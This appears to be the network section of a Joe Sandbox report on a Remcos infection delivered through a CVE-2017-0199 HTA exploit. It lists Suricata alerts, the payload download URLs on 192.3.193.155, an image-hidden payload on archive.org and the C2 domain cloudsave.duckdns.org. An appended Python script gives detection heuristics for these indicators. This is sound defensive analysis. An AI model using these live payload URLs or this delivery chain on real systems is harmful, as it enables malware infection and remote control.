                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic | TCP traffic: 192.3.193.155:80 -> 192.168.2.22:49167
                  Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80

                  Networking

                  Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.193.155:80 -> 192.168.2.22:49164
                  Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.193.155:80 -> 192.168.2.22:49166
                  Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49170 -> 192.3.64.135:14645
                  Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49175 -> 192.3.193.155:80
                  Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.193.155:80 -> 192.168.2.22:49169
                  Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.193.155:80 -> 192.168.2.22:49169
                  Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.193.155:80 -> 192.168.2.22:49177
                  Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.193.155:80 -> 192.168.2.22:49177
                  Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49168
                  Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49176
                  Source: Malware configuration extractor | URLs: cloudsave.duckdns.org
                  Source: unknown | DNS query: name: cloudsave.duckdns.org
                  Source: global traffic | HTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1 | Host: ia803104.us.archive.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1 | Host: ia803104.us.archive.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xampp/boz/REDS.txt HTTP/1.1 | Host: 192.3.193.155 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                  Source: global traffic | HTTP traffic detected: GET /xampp/boz/REDS.txt HTTP/1.1 | Host: 192.3.193.155 | Connection: Keep-Alive
                  Source: Joe Sandbox View | IP Address: 207.241.232.154
                  Source: Joe Sandbox View | IP Address: 88.99.66.38
                  Source: Joe Sandbox View | IP Address: 178.237.33.50
                  Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
                  Source: Joe Sandbox View | ASN Name: INTERNET-ARCHIVEUS
                  Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49172 -> 178.237.33.50:80
                  Source: global traffic | HTTP traffic detected: GET /pitash HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: zhort.de | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /pitash HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: zhort.de | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /pitash HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: zhort.de | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /pitash HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: zhort.de | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.193.155 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Range: bytes=8895- | Connection: Keep-Alive | Host: 192.3.193.155 | If-Range: "1ccb3-620b4202337ba"
                  Source: global traffic | HTTP traffic detected: GET /xampp/boz/wecreatedbuttersmoothbutterthings.tIF HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.193.155 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | If-Modified-Since: Wed, 28 Aug 2024 01:17:45 GMT | Connection: Keep-Alive | Host: 192.3.193.155 | If-None-Match: "1ccb3-620b4202337ba"
                  Source: unknown | HTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: unknown | TCP traffic detected without corresponding DNS query: 192.3.193.155 (this identical finding is listed 50 times in the report, once per connection to the hard-coded IP)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_000007FE899B7018 URLDownloadToFileW,7_2_000007FE899B7018
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B73744D0.emf
Source: global traffic | HTTP traffic detected: GET /pitash HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: zhort.de | Connection: Keep-Alive (seen twice)
Source: global traffic | HTTP traffic detected: GET /pitash HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: zhort.de | Connection: Keep-Alive (seen twice)
Source: global traffic | HTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1 | Host: ia803104.us.archive.org | Connection: Keep-Alive (seen twice)
Source: global traffic | HTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.193.155 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Range: bytes=8895- | Connection: Keep-Alive | Host: 192.3.193.155 | If-Range: "1ccb3-620b4202337ba"
Source: global traffic | HTTP traffic detected: GET /xampp/boz/wecreatedbuttersmoothbutterthings.tIF HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.193.155 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xampp/boz/REDS.txt HTTP/1.1 | Host: 192.3.193.155 | Connection: Keep-Alive (seen twice)
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | If-Modified-Since: Wed, 28 Aug 2024 01:17:45 GMT | Connection: Keep-Alive | Host: 192.3.193.155 | If-None-Match: "1ccb3-620b4202337ba"
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: zhort.de
Source: global traffic | DNS traffic detected: DNS query: ia803104.us.archive.org
Source: global traffic | DNS traffic detected: DNS query: cloudsave.duckdns.org
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
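As an added example (not part of the Joe Sandbox report), the Python below triages HTTP request and DNS entries of the shape listed above and tags the traits a responder would pivot on: a raw-IP Host header (the same fact the "TCP traffic without corresponding DNS query" entries record), a script-file download such as the .hta fetched by mshta.exe, the legacy IE7-compatibility User-Agent plus UA-CPU header that URLMon/WinINet-based clients like mshta.exe send in place of a real browser's, the geoplugin.net/json.gp lookup Remcos performs at start-up, and a query for a dynamic-DNS name such as cloudsave.duckdns.org. The sample requests and names are constructed from the entries above; the dynamic-DNS suffix list, the tag names and the benign control request are the example's own assumptions.

```python
"""Triage network indicators of the kind listed in this report.

Added example, not Joe Sandbox output.  The requests below are constructed
to mirror the report's entries (one header per line; the report prints
them run together); the heuristics are the example author's own.
"""
import ipaddress
import posixpath
import re
from urllib.parse import urlsplit

# Constructed samples.  The last request is a benign control.
SAMPLE_REQUESTS = [
    "GET /pitash HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0)\r\n"
    "Host: zhort.de\r\nConnection: Keep-Alive\r\n",
    "GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1\r\n"
    "Host: ia803104.us.archive.org\r\nConnection: Keep-Alive\r\n",
    "GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0)\r\n"
    "Host: 192.3.193.155\r\nConnection: Keep-Alive\r\n",
    "GET /xampp/boz/wecreatedbuttersmoothbutterthings.tIF HTTP/1.1\r\n"
    "Host: 192.3.193.155\r\nConnection: Keep-Alive\r\n",
    "GET /json.gp HTTP/1.1\r\nHost: geoplugin.net\r\nCache-Control: no-cache\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n",
]
SAMPLE_DNS = ["zhort.de", "ia803104.us.archive.org", "cloudsave.duckdns.org",
              "geoplugin.net", "www.example.com"]

SCRIPT_EXTENSIONS = {".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1"}
# Assumption: an illustrative list of dynamic-DNS suffixes; extend for your estate.
DYNDNS_SUFFIXES = (".duckdns.org", ".ddns.net", ".no-ip.org", ".hopto.org")
# Free IP-geolocation endpoint that Remcos queries after start-up.
GEO_ENDPOINTS = {("geoplugin.net", "/json.gp")}
# Legacy IE7-compatibility string sent by URLMon/WinINet clients (mshta.exe,
# Office); a real IE11 on the same Windows 7 host reports Mozilla/5.0.
URLMON_UA = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE 7\.0; Windows NT ")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target and lower-cased headers."""
    lines = [ln for ln in raw.split("\r\n") if ln]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def is_ip_literal(host):
    """True when the Host header is a bare IP address (no DNS lookup precedes it)."""
    try:
        ipaddress.ip_address(host.split(":")[0])  # tolerate an optional :port
        return True
    except ValueError:
        return False


def classify_request(raw):
    """Return the sorted list of indicator tags that fire for one request."""
    req = parse_request(raw)
    host = req["headers"].get("host", "").lower()
    path = urlsplit(req["target"]).path
    ext = posixpath.splitext(path)[1].lower()
    tags = []
    if is_ip_literal(host):
        tags.append("direct_to_ip")        # pairs with "TCP traffic without DNS query"
    if ext in SCRIPT_EXTENSIONS:
        tags.append("script_download")     # e.g. the .hta pulled by mshta.exe
    if (host, path) in GEO_ENDPOINTS:
        tags.append("geolocation_checkin")  # Remcos start-up geolocation lookup
    if URLMON_UA.match(req["headers"].get("user-agent", "")) and "ua-cpu" in req["headers"]:
        tags.append("urlmon_client")       # script-host download, not a browser session
    return sorted(tags)


def classify_dns(name):
    """Return indicator tags for one queried name."""
    return ["dynamic_dns"] if name.lower().endswith(DYNDNS_SUFFIXES) else []


def triage(requests=SAMPLE_REQUESTS, dns_names=SAMPLE_DNS):
    """Map each flagged URL or DNS name to its tags; clean entries are omitted."""
    findings = {}
    for raw in requests:
        tags = classify_request(raw)
        if tags:
            req = parse_request(raw)
            findings["http://%s%s" % (req["headers"]["host"], req["target"])] = tags
    for name in dns_names:
        tags = classify_dns(name)
        if tags:
            findings["dns:" + name] = tags
    return findings


if __name__ == "__main__":
    for indicator, tags in triage().items():
        print(indicator, "->", ", ".join(tags))
```

Run stand-alone it prints five flagged indicators and stays silent on the archive.org image fetch and the control request; the .hta download collects all three request-level tags at once, which is the combination worth alerting on rather than any single trait.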
